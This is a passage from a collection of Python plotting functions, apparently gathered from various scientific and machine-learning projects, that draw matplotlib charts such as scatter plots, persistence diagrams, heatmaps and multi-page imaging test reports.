density_map, alpha=0.8)\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('density')\n\n #plt.tight_layout()\n plt.savefig(name + \".3d.%d.png\" % (plot_count))\n plt.close()\n\n #plt.clf()\n\n #fig, ax = plt.subplots()\n\n #ax.pcolor(density_map)\n\n ## Loop over data dimensions and create text annotations.\n ##for i in range(density_map.shape[0]):\n ## for j in range(density_map.shape[1]):\n ## text = ax.text(j, i, density_map[i, j],\n ## ha=\"center\", va=\"center\", color=\"w\")\n #fig.tight_layout()\n #plt.savefig(name+\".2d.%d.png\" % (plot_count))\n #plt.close()", "def generate_results(self, test_no, test_dict):\n g_s = gridspec.GridSpec(4, 2, wspace=0.2, hspace=1.5)\n fig = plt.figure(figsize=(20, 6))\n fig.suptitle('Experiment Results', y=0.93)\n\n x_val = np.arange(1, self.iters+1)\n\n ax1 = plt.subplot(g_s[0:3, :1], label = 'Mean Rewards')\n ax1.set_title('Mean Rewards')\n ax1.scatter(x_val, self.mean_rewards, s=5)\n ax1.set(xlabel='Iteration', ylabel='Mean Reward')\n\n ax2 = plt.subplot(g_s[0:3, 1:])\n ax2.scatter(x_val, self.sub_goals, s=5, label='Sub-optimal Goal')\n ax2.scatter(x_val, self.opt_goals, s=5, label='Optimal Goal')\n ax2.set_title('Goal Success Percentage by Type')\n ax2.set(xlabel='Iteration', ylabel='Success Percentage (%)')\n ax2.legend(loc=0)\n\n cells = list(test_dict.values())\n cells = [str(i) for i in cells]\n columns = list(test_dict.keys())\n ax3 = plt.subplot(g_s[3:, :])\n ax3.axis('off')\n ax3.table(cellText=[cells], colLabels=columns, loc='center', cellLoc='center')\n\n plt.savefig(f'results/charts/Test_{test_no}.png', bbox_inches='tight')", "def plot_collective(xdict, ydict, xprop, yprop, documents):\n x_ion = {\"Mg\": [], \"Ca\": [], \"Zn\": [], \"Li\": [], \"Na\": []}\n y_ion = {\"Mg\": [], \"Ca\": [], \"Zn\": [], \"Li\": [], \"Na\": []}\n for item in documents:\n if item[\"path_id\"][-3:] == \"001\":\n x_ion[item[\"cation_type\"]].append(xdict[item[\"path_id\"]])\n y_ion[item[\"cation_type\"]].append(ydict[item[\"path_id\"]])\n fig = plt.figure(figsize=(6,6), dpi=plotting_dpi)\n ax = 
fig.add_subplot(111)\n for ion in [\"Mg\", \"Ca\", \"Zn\", \"Li\", \"Na\"]:\n ax.scatter(x_ion[ion], y_ion[ion], s=70, zorder=2, color=color_dict[ion], linewidths=2.5, edgecolors='black',\n label=ion)\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n \n # # Plot lines for fitting, if useful\n # x2 = np.arange(-700, 3300, 1)\n # ax.plot(x2, x2)\n \n # # For setting axis boundaries\n # ax.set_xlim([-700, 3500])\n # ax.set_ylim([0,100])\n \n # Plot display settings\n ax.set_xlabel(xlabel, fontsize=24)\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size':10})\n # plt.legend(loc='best')\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.show()", "def plotObsExpSigEnrichment(f):\n mat = pd.read_csv(f, sep=\"\\t\", index_col=0)\n fig, ax = pylab.subplots()\n ax.plot(mat.index,\n mat[\"observed\"] * 100,\n color=colors[0],\n label=\"observed\")\n ax.plot(mat.index,\n mat[\"expected\"] * 100,\n color=colors[1],\n label=\"expected\")\n ax.set_xlabel(\"Percentage of Bins\")\n ax.set_ylabel(\"Percetange of PETs\")\n ax.legend(loc=\"upper left\")\n #ax2 = ax.twinx()\n #ax2.plot( mat.index, mat[\"Obs/Exp\"],color=colors[2],label=\"Obs/Exp\")\n #ax2.set_ylabel(\"Obs/Exp\")\n #for t in ax2.get_yticklabels():\n # t.set_color(colors[2])\n pylab.savefig(\"%s.pdf\" % (f.replace(\".txt\", \"\")))", "def plot_modelparametercollections(plotname, parametercollection_SF, parametercollection_AGN,\n stat_SF, stat_AGN, AGNcol='blue',SFcol='red', constraintsstr=None,\n fluxratiodictionarylist=None, verbose=True):\n\n Nobj = len(parametercollection_SF)\n if verbose: print(' - Will generate plots of NEOGAL \"PDFs\" for all '+str(Nobj)+' objects in parameter collections')\n for oo in np.arange(Nobj):\n objid = parametercollection_SF[oo]['id']\n if verbose:\n infostr = ' plotting info for '+str(objid)+' ('+str(\"%.5d\" % (oo+1))+' / '+str(\"%.5d\" % Nobj)+') '\n sys.stdout.write(\"%s\\r\" % infostr)\n sys.stdout.flush()\n plotname_obj = plotname.replace('.pdf','_id'+str(objid)+'.pdf')\n # if verbose: print(' - Generating the figure '+plotname_obj)\n figuresize_x = 6\n figuresize_y = 5\n fig = plt.figure(figsize=(figuresize_x,figuresize_y))\n Fsize = 9\n LW = 2\n plt.rc('text', usetex=True) # enabling LaTex rendering of text\n plt.rc('font', family='serif',size=Fsize) # setting text font\n plt.rc('xtick', labelsize=Fsize)\n plt.rc('ytick', labelsize=Fsize)\n plt.clf()\n plt.ioff()\n\n left = 0.10 # the left side of the subplots of the figure\n right = 0.95 # the right side of the subplots of the figure\n bottom = 0.10 # the bottom of the subplots of the figure\n top = 0.90 # the top of the subplots of the figure\n wspace = 1.50 # the amount of width reserved for blank space between subplots\n hspace = 0.50 # the amount of height reserved for white space between subplots\n plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top, wspace=wspace, hspace=hspace)\n\n Nrows, Ncols = 3, 6\n ylabel = 'Number of NEOGAL SF ('+str(SFcol)+') and AGN ('+str(AGNcol)+') models'\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n Nmodels_SF = float(len(parametercollection_SF[oo]['Zgas']))\n Nmodels_AGN = float(len(parametercollection_AGN[oo]['Zgas']))\n\n titlestr = 'Models satisfying ID='+str(objid)+' cuts: 
SF='+str(Nmodels_SF)+'; AGN='+str(Nmodels_AGN)\n if (Nmodels_AGN > 0) & (Nmodels_SF > 0):\n Nmodels_ratio = Nmodels_SF/Nmodels_AGN\n titlestr_addition = '; SF/AGN='+str(\"%.4f\" % Nmodels_ratio)\n titlestr = titlestr+titlestr_addition\n\n if fluxratiodictionarylist is not None:\n constraints = fluxratiodictionarylist[oo]\n constraintslist = [key+':['+str(\"%.2f\" % constraints[key][0])+','+str(\"%.2f\" % constraints[key][1])+']'\n for key in constraints.keys() if key not in ['id']]\n\n if len(constraintslist) < 4:\n constraintsstr = '; '.join(constraintslist)\n elif (len(constraintslist) > 3) & (len(constraintslist) < 7):\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])\n elif (len(constraintslist) > 6) & (len(constraintslist) < 10):\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])+\\\n '\\n'+'; '.join(constraintslist[6:])\n else:\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])+\\\n '\\n'+'; '.join(constraintslist[6:9])+'\\n'+'; '.join(constraintslist[9:])\n\n constraintsstr = constraintsstr.replace('10000000000.00','1e10')\n\n titlestr = titlestr+'\\n'+constraintsstr\n # titlestr = r'{\\fontsize{'+str(Fsize)+'pt}{3em}\\selectfont{}{'+titlestr+'\\r}{\\fontsize{'+str((Fsize-2.))+'pt}{3em}\\selectfont{}('+constraintsstr+'}'\n\n # plt.text(x=0.5, y=0.94, s=titlestr, fontsize=Fsize, ha=\"center\", transform=fig.transFigure)\n # plt.text(x=0.5, y=0.88, s=constraintsstr, fontsize=Fsize-2, ha=\"center\", transform=fig.transFigure)\n # fig.title(titlestr,fontsize=Fsize)\n fig.suptitle(titlestr,fontsize=Fsize-2)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # Zgas\n plt.subplot(Nrows, Ncols, (1,3))\n\n bindefs = np.array([0.0001, 0.0002, 0.0005, 0.001, 0.002, 0.004, 0.006, 0.008, 0.014,\n 0.017, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07])-0.00001\n\n plotkey = 'Zgas'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xscale('log')\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([0.00001,0.1])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # logUs\n plt.subplot(Nrows, Ncols, (4,6))\n\n bindefs = np.arange(-4.75, -0.25, 0.5)\n\n plotkey = 'logUs'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-5,-0.5])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # xid\n plt.subplot(Nrows, Ncols, (7,9))\n\n bindefs = np.array([0.0, 0.2, 0.4, 0.6])\n\n plotkey = 'xid'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-0.05,0.65])\n plt.ylabel(ylabel)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # nh\n plt.subplot(Nrows, Ncols, (10,12))\n\n bindefs = 10**np.array([1.5, 2.5, 3.5, 4.5])\n\n plotkey = 'nh'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n stat_SF[oo][plotkey],stat_AGN[oo][plotkey],\n 
SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n plt.xscale('log')\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([10,1e5])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # COCOsol\n plt.subplot(Nrows, Ncols, (13,14))\n\n #bindefs = np.array([0.10, 0.14, 0.20, 0.27, 0.38, 0.52, 0.72, 1.00, 1.40])\n bindefs = np.arange(0.05,1.5,0.06)\n\n plotkey = 'COCOsol'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],None,\n stat_SF[oo][plotkey],None,\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([0.00,1.55])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # mup\n plt.subplot(Nrows, Ncols, (15,16))\n\n bindefs = np.array([0,200,400])\n\n plotkey = 'mup'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],None,\n stat_SF[oo][plotkey],None,\n SFcol,AGNcol,LW,bindefs=bindefs,Nbins=None)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-10,410])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # alpha\n plt.subplot(Nrows, Ncols, (17,18))\n\n bindefs = np.array([-2.15,-1.85,-1.55,-1.25,-0.95])\n\n plotkey = 'alpha'\n Nbins = 10\n nm.plot_modelparametercollections_addhist(None,parametercollection_AGN[oo][plotkey],\n None,stat_AGN[oo][plotkey],\n SFcol,AGNcol,LW,bindefs=None,Nbins=Nbins)\n\n plt.xlabel(nm.keylabels(plotkey))\n plt.xlim([-2.2,-0.9])\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n plt.savefig(plotname_obj)\n plt.clf()\n plt.close('all')\n # if verbose: print(' - Successfully saved figure to file')\n if verbose: print('\\n done...')", "def plot_PDs(output_path,M_max,max_dim,normalized=False,output_name=None):\n plots_folder = os.path.join(output_path,'plots')\n if output_name is None: \n aux = ['PDs']\n input_file = os.path.join(output_path,'outputs_PDS.csv')\n else:\n aux = [output_name,'PDs']\n input_file = os.path.join(output_path,'%s_PDS.csv' % output_name)\n if normalized is True:\n aux.append('normalized')\n plot_file_name = '-'.join(aux)+'.png'\n plot_file_name = os.path.join(plots_folder,plot_file_name)\n\n \n data = pd.read_csv(input_file,index_col = 0)\n \n\n fig_size_aux = 15/(3-max_dim)\n plt.figure(figsize=(fig_size_aux,5))\n if(normalized):\n for i in range(1,max_dim+2):\n plt.subplot(1,max_dim+1,i, aspect='equal')\n plt.plot(data[data.dimH==i-1].birth.values/np.float(M_max),data[data.dimH==i-1].death.values/np.float(M_max),'bo',alpha=.3,label='dim %i'%(i-1))\n plt.xlim((0,1)); plt.ylim((0,1))\n frame = plt.legend(loc=4,frameon=True,title='normalized')\n frame = frame.get_frame()\n frame.set_edgecolor('black')\n plt.xlabel('birth'); plt.ylabel('death')\n plt.plot([0, 1], [0, 1], ls=\"--\", c=\".3\")\n plt.suptitle('Persistence Diagrams')\n plt.savefig(plot_file_name)\n print 'Saved PDs plots in %s'%plot_file_name\n else:\n for i in range(1,max_dim+2):\n plt.subplot(1,max_dim+1,i, aspect='equal')\n plt.plot(data[data.dimH==i-1].birth.values,data[data.dimH==i-1].death.values,'bo',alpha=.3,label='dim %i'%(i-1))\n plt.xlim((0,M_max)); plt.ylim((0,M_max))\n frame = plt.legend(loc=4,frameon=True)\n frame = frame.get_frame()\n frame.set_edgecolor('black')\n plt.xlabel('birth'); plt.ylabel('death')\n plt.plot([0, M_max], [0, M_max], ls=\"--\", c=\".3\")\n plt.suptitle('Persistence Diagrams')\n plt.savefig(plot_file_name)\n print 'Saved PDs plots in %s'%plot_file_name\n return()", "def PlotMA(df, show_plot=True):\n # Ensure 'Study' is in header.\n # TODO: Add code.\n # 
Obtain monthly means.\n df_ave = stats.MonthlyMean(df)\n # Get list of variables.\n var_list = set(df_ave.columns.get_level_values('Part B'))\n # Determine number of axes in the figure.\n n_var = len(var_list)\n n_row = np.int(np.around(np.sqrt(n_var)))\n if n_row**2 >= n_var:\n n_col = n_row\n else:\n n_col = n_row + 1\n fig, ax = plt.subplots(nrows=n_row, ncols=n_col, figsize=(16, 9))\n # Remove extra axes, if necessary.\n if n_row * n_col != n_var:\n n_empty = n_row * n_col - n_var\n for k in range(n_empty):\n ax[-1, -(1+k)].remove()\n # Initialize variables for updating axes.\n cur_row = 0\n cur_col = 0\n var_width = 0.9\n idx = np.arange(12)\n x_min = 0\n x_max = 12\n # Plot each variable.\n for var in var_list:\n df_var = df_ave.xs(var, level='Part B', axis=1)\n # Initialize parameters for current axis.\n y_min = np.min(df_var.values) * 0.95\n y_max = np.max(df_var.values) * 1.05\n col_var = df_var.columns\n bar_width = var_width / len(col_var)\n # Select current axis.\n if n_row == 1 and n_col == 1:\n ax_cur = ax\n elif n_row == 1:\n ax_cur = ax[cur_col]\n else:\n ax_cur = ax[cur_row, cur_col]\n # Plot study results for each variable.\n for c in col_var:\n idx_c = idx + 0.05 + col_var.get_loc(c) * bar_width\n val_c = df_var[c].values\n lab_c = '{} {}'.format(*c[:2])\n ax_cur.bar(idx_c, val_c, bar_width, label=lab_c, align='edge')\n # Set plot title.\n ax_cur.set_title('Monthly Averages of {}'.format(var))\n # Modify x-axis and y-axis.\n ax_cur.set_xticks(idx + 0.5)\n tick_labels = list(df_ave.index)\n ax_cur.set_xticklabels(tick_labels)\n label_c = set(df_var.columns.get_level_values('Part C'))\n _unit = df_var.columns.get_level_values('Units')\n _dtyp = df_var.columns.get_level_values('Data Type')\n unit_d = list(zip(_unit, _dtyp))\n combo_unit = [' '.join(i) for i in unit_d]\n label_u = set(combo_unit)\n ax_cur.set_ylabel('{} ({})'.format(r'/'.join(label_c),\n r'/'.join(label_u)))\n ax_cur.set_ylim(bottom=y_min, top=y_max)\n ax_cur.set_xlim(left=x_min, right=x_max)\n ax_cur.set_xlabel('Month')\n ax_cur.spines['right'].set_visible(False)\n ax_cur.spines['top'].set_visible(False)\n # Set legend.\n ax_cur.legend(title='Study, Part A')\n # Update current axis.\n cur_col += 1\n if cur_col >= n_col:\n cur_col = 0\n cur_row += 1\n # Adjust layout.\n plt.tight_layout()\n # Add figure notes.\n t = PlotChartNotes()\n if n_row * n_col != n_var:\n x_pos = (1 - n_empty / n_col) * 1.05\n y_pos = (1 / n_row) * 0.95\n plt.figtext(x_pos, y_pos, t, ha='left', va='top', wrap=True)\n else:\n plt.figtext(0.05, 0, t, ha='left', va='bottom', wrap=True)\n plt.subplots_adjust(bottom=0.2)\n # Show plot, if requested.\n if show_plot:\n plt.show()\n # Return figure and axes.\n return fig, ax", "def logit_model_plots(ds,Population = 'Population_%',Event_rate ='Event_rate',decile ='Band',Cumulative_Non_Event = 'Cumulative_Non_Event_%',Cumulative_Event= 'Cumulative_Event_%',sample_type ='Development'):\n \n import matplotlib.pyplot as plt\n fig, (ax1, ax2) = plt.subplots(1, 2,figsize=(15, 4))\n _= ax1.plot(plot_df[Cumulative_Non_Event],plot_df[Cumulative_Event])\n _= ax1.set_ylabel(Cumulative_Non_Event)\n _= ax1.set_title('Gini Curve : '+str(sample_type) +' sample')\n _= ax1.set_xlabel(Cumulative_Event)\n\n _= plot_df[Population].plot(kind='bar', color='b', width = 0.35,legend=True , label = Population)\n _= plot_df[Event_rate].plot(kind='line',color ='r', secondary_y=True,legend=True, label = Event_rate)\n _= ax2.set_xticklabels(plot_df[decile])\n _= ax2.set_ylim(0,plot_df[Event_rate].max()*0.15)\n _= 
ax2.right_ax.set_ylim(0,plot_df[Event_rate].max()*1.5)\n _= ax2.right_ax.set_ylabel(Event_rate)\n _= ax2.set_ylabel(Population)\n _= ax2.set_title('Decile Wise Event Rate : ' +str(sample_type) +' sample')\n _= ax2.set_xlabel(decile)\n plt.show()", "def ploter(self):\n if len(self.dataset[self.first_title]) != 2:\n print('plot is only avilable for two features')\n return\n x_axis = []\n y_axis = []\n for title in self.dataset:\n x_axis.append(self.dataset[title][0])\n y_axis.append(self.dataset[title][1])\n plt.plot(x_axis, y_axis, 'o')\n plt.show()", "def hotspot_fields_plot(self, results_dict, tas_bound=None, pr_bound=None):\n sorted_keys = [(f\"{period}_{season}_{variable}\"\n f\"_{project}_{results_dict['scenario']}\")\n for variable in self.variables\n for period in self.cfg[\"future_periods\"]\n for project in self.projects for season in self.seasons]\n sorted_keys = [\n sorted_keys[:len(sorted_keys) // 2],\n sorted_keys[len(sorted_keys) // 2:]\n ]\n ancestor_files_var = [[\n ancestor_file for ancestor_file in results_dict[\"ancestors\"]\n if f\"/{var}_\" in ancestor_file\n ] for var in self.variables]\n for ancestor_files, keys, variable in zip(ancestor_files_var,\n sorted_keys, self.variables):\n fig = plt.figure(figsize=(14.4, 3.4),\n constrained_layout=True,\n dpi=300)\n plt.gcf().subplots_adjust()\n # bound colorbar to abs(max) value on the map\n style = self.cb_bounds(variable, results_dict, keys,\n [tas_bound, pr_bound])\n # plot each panel\n fill, frame = self._hotspot_fields_plot_panels(\n results_dict, fig, keys, style)\n # plot figtexts\n self._hotspot_fields_plot_figtexts(results_dict['scenario'], frame)\n # plot line\n self._hotspot_fields_plot_line(fig, frame)\n # plot colorbar\n cbar = plt.colorbar(fill,\n plt.gcf().add_axes([0.25, 0.125, 0.5, 0.04]),\n orientation=\"horizontal\",\n extend=\"both\")\n if variable == \"pr\":\n cbar.set_label(\"%\")\n against_region = (\n f\"{self.cfg['region'][2]}$^o$ N-\"\n f\"{self.cfg['region'][3]}$^o$ N latitudinal belt\")\n else:\n cbar.set_label(\n self.formatter(str(results_dict[keys[-1]].units)))\n against_region = \"global\"\n\n # plot title and save\n self._hotspot_fields_plot_save(against_region, variable,\n results_dict['scenario'],\n ancestor_files)", "def make_N4255_plots(data_obj, aspect_corr=1.0, title_pages=False):\n\n print(\"Generating plots...\")\n\n #Create color maps\n cmap = plt.get_cmap('jet')\n cmap = plt.get_cmap('gray')\n\n #Call the function to create the title page of the pdf document\n plot_front_title(data_obj)\n\n #-----------------------------------------------------------------------#\n # Initialize the position variables for the text and graphs on the pdf. 
#\n #-----------------------------------------------------------------------#\n y0 = 0.9\n dy = [0.03, 0.025]\n\n ha = 'left'\n va = 'center'\n fs = 10\n dfs = 2\n\n # metric name value unc min\n xpos = [0.0, 0.4, 0.5, 0.75]\n yi = y0 - 0.1 # The position of the text on the y access, which is constantly updated as more text is added\n\n #-----------------------------------------------------------------------------------#\n # Plot the 'summary' page listing all the tests and the overall results - TEXT ONLY #\n #-----------------------------------------------------------------------------------#\n\n #Create the title of the page\n plot_overall_text(data_obj, yi, xpos, ha, va, fs)\n\n #Plot the overall results text of the first test, Penetration\n yi = yi - dy[0]\n plot_pen_text(data_obj, 1, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the first test, Organic Material Detection\n yi = yi - dy[0]\n plot_BSNR_text(data_obj, 2, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the third test, Spatial Resolution\n yi = yi - dy[0]\n plot_spatial_text(data_obj, 3, yi, yi - dy[1], xpos, ha, va, fs, dfs)\n yi = yi - dy[1] #Make sure the local yi is updated\n\n #Plot the overall results text of the fourth test, Dynamic Range\n yi = yi - dy[0]\n plot_dyn_text(data_obj, 4, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the fifth test, NEQ Noise\n yi = yi - dy[0]\n plot_noise_text(data_obj, 5, yi, dy, xpos, ha, va, fs, dfs)\n yi = yi - (dy[1] * 2) #Make sure to update yi, as it was only locally changed in 'plot_noise_text()'\n\n #Plot the overall results text of the sixth test, Flatness of field\n yi = yi - dy[0]\n plot_ff_text(data_obj, 6, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the seventh test, Image Extent\n yi = yi - dy[0]\n plot_extent_text(data_obj, 7, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the eighth test, Image Area\n yi = yi - dy[0]\n plot_area_text(data_obj, 8, yi, xpos, ha, va, fs, dfs)\n\n #Plot the overall results text of the ninth test, Aspect Ratio\n yi = yi - dy[0]\n plot_a_ratio_text(data_obj, 9, yi, xpos, ha, va, fs, dfs)\n\n #--------------------------------------------------#\n # Plot the footnotes for the overall results page. 
#\n #--------------------------------------------------#\n plot_overall_footnotes(xpos, ha, va, fs, dfs)\n\n\n #-----------------#\n # Plot the images #\n #-----------------#\n plot_images(data_obj, fs) #Plot the images to the pdf\n\n plot_image_footnotes(data_obj, xpos, ha, va, fs, dfs) #Add in the footnotes to the pdf\n\n\n #-------------------#\n # Penetration plots #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 1: Penetration\")\n\n #Call the function to plot the Steel Penetration results to the pdf\n plot_steel_pen_N4255(data_obj, 1)\n\n\n #------------#\n # BSNR plots #\n #------------#\n if title_pages:\n new_title_page(data_obj, \"Test 2: Organic Material Detection\")\n\n # Call the function to plot the Organic Material Detection results to the pdf\n plot_BSNR(data_obj, 2, cmap)\n\n\n #--------------------#\n # Spatial Resolution #\n #--------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 3: Spatial Resolution\")\n\n # Call the function to plot the Spatial Resolution results to the pdf\n plot_spatial_res(data_obj, 3)\n\n #---------------#\n # Dynamic Range #\n #---------------#\n if title_pages:\n new_title_page(data_obj, \"Test 4: Dynamic Range\")\n\n # Call the function to plot the Dynamic Range results to the pdf\n plot_dynamic_range(data_obj, 4)\n\n #-------#\n # Noise #\n #-------#\n if title_pages:\n new_title_page(data_obj, \"Test 5: Noise (NEQ)\")\n\n # Call the function to plot the Noise (NEQ) results to the pdf\n plot_noise(data_obj, 5)\n\n #-------------------#\n # Flatness of field #\n #-------------------#\n if title_pages:\n new_title_page(data_obj, \"Test 6: Flatness of Field\")\n\n # Call the function to plot the Flatness of Field results to the pdf\n plot_field_flatness(data_obj, 6)\n\n #--------------#\n # Image extent #\n #--------------#\n if title_pages:\n new_title_page(data_obj, \"Test 7: Image Extent\")\n\n # Call the function to plot the Image Extent results to the pdf\n plot_image_extent(data_obj, 7)\n\n\n #------------#\n # Image Area #\n #------------#\n if title_pages:\n fig = new_pdf_page(data_obj.pdf_obj)\n plt.axis('off')\n plt.text(0.5, 0.5, 'Test 8: Image Area', ha='center', va='center', fontsize=20)\n str1 = str(data_obj.image_area[0]) + ' by ' + str(data_obj.image_area[1]) + ' pixels'\n plt.text(0.5, 0.4, str1, ha='center', va='center', fontsize=12)\n\n #--------------#\n # Aspect Ratio #\n #--------------#\n if title_pages:\n new_title_page(data_obj, \"Test 9: Aspect Ratio\")\n\n #Call the function to plot the Aspect Ratio results to the pdf\n plot_aspect_ratio(data_obj, 9, cmap, aspect_corr)\n\n fig = new_pdf_page(data_obj.pdf_obj, open_fig=False)", "def covariance_plot(catl_pd, param_dict, proj_dict, plot_only_feat=False,\n fig_fmt='pdf', figsize=(10, 8), fig_number=2):\n file_msg = param_dict['Prog_msg']\n plot_dict = param_dict['plot_dict']\n ## Filename\n fname = os.path.join( proj_dict['figure_dir'],\n 'Fig_{0}_{1}_feature_covariance.{2}'.format(\n fig_number,\n param_dict['catl_str_fig'],\n fig_fmt))\n ##\n ## Paper Figure\n fname_paper = os.path.join( proj_dict['paper_fig_dir'],\n 'Figure_02.{0}'.format(fig_fmt))\n ## Renaming properties\n catl_pd_copy = catl_pd.copy()\n ## Dropping columns\n cols_drop = ['GG_pointing', 'GG_haloid_point', 'GG_mhalo_point', \n 'g_brightest', 'GG_r_rms']\n catl_pd_copy.drop(cols_drop, axis=1, inplace=True)\n ## Reordering columns\n mhalo_key = 'M_h'\n # Saving data from Halo mass\n gal_mhalo_arr = catl_pd_copy[mhalo_key].values\n # Removing Halo mass\n 
catl_pd_copy.drop(mhalo_key, axis=1, inplace=True)\n # Inserting it back again to the DataFrame\n catl_pd_copy.insert(0, mhalo_key, gal_mhalo_arr)\n ##\n ## Rearranging columns\n df_cols_new = [ 'M_h','dist_centre_group', 'M_r', 'logssfr', 'g_galtype',\n 'g_r', 'GG_mr_brightest', 'GG_mr_ratio',\n 'GG_M_r', 'GG_logssfr', 'GG_shape', 'GG_ngals',\n 'GG_rproj', 'GG_r_tot', 'GG_r_med', 'GG_sigma_v',\n 'GG_sigma_v_rmed', 'GG_M_group', 'GG_mdyn_rproj',\n 'GG_dist_cluster']\n catl_pd_copy = catl_pd_copy.loc[:, df_cols_new]\n # Plotting only features if applicable\n if plot_only_feat:\n feat_cols = param_dict['ml_args']._feature_cols()\n catl_pd_copy = catl_pd_copy.loc[:,feat_cols]\n ## Renaming\n catl_pd_copy.rename(columns=param_dict['feat_cols_dict'], inplace=True)\n ## Selecting certain columns only\n ## Figure details\n plt.clf()\n plt.close()\n fig = plt.figure(figsize=figsize)\n ax1 = fig.add_subplot(111, facecolor='white')\n fig.subplots_adjust(bottom=0.1, top=0.9, left=0.1, right=0.8,\n wspace=0.02, hspace=0.02)\n cax = fig.add_axes([0.30, 0.85, 0.30, 0.05])\n ## Correlation\n corr = catl_pd_copy.corr()\n # Generate a mask for the upper triangle\n mask = num.zeros_like(corr, dtype=num.bool)\n mask[num.triu_indices_from(mask)] = True\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n # Draw the heatmat with the mask and correct aspect ratio\n g = sns.heatmap(corr, mask=mask, cmap=cmap, vmax=1.0, vmin=-1., center=0,\n square=True, linewidths=0.5, cbar=False, ax=ax1)\n cbar = fig.colorbar(g.get_children()[0], cax=cax, orientation='horizontal')\n cbar.set_label(r'$\\Leftarrow$ Correlation $\\Rightarrow$',\n fontsize=plot_dict['size_label'])\n cbar.ax.tick_params(labelsize=20)\n g.yaxis.set_tick_params(labelsize=25)\n g.xaxis.set_tick_params(labelsize=25)\n ##\n ## Saving figure\n if fig_fmt=='pdf':\n plt.savefig(fname, bbox_inches='tight')\n plt.savefig(fname_paper, bbox_inches='tight')\n else:\n plt.savefig(fname, bbox_inches='tight', dpi=400)\n plt.savefig(fname_paper, bbox_inches='tight', dpi=400)\n ##\n ##\n print('{0} Figure saved as: {1}'.format(file_msg, fname))\n print('{0} Paper Figure saved as: {1}'.format(file_msg, fname_paper))\n plt.clf()\n plt.close()", "def output_results(self, filename):\n\n self.data.plot(title='Result of applying {} onto data set'.format(self.transformations[-1]))\n plt.savefig(\"results/{}.png\".format(filename))\n plt.close()", "def visualizePredictions(testData,knn_predictions):\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n testData.dataDict[testData.reference] = knn_predictions\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n\r\n pass", "def make_F792_plots(data_obj, title_pages=False):\n\n print(\"Generating plots...\")\n\n # Create color maps\n cmap = plt.get_cmap('jet')\n cmap = plt.get_cmap('gray')\n\n # Call the\n plot_front_title(data_obj)\n\n # -----------------------------------------------------------------------#\n # Initialize the position variables for the text and graphs on the pdf. 
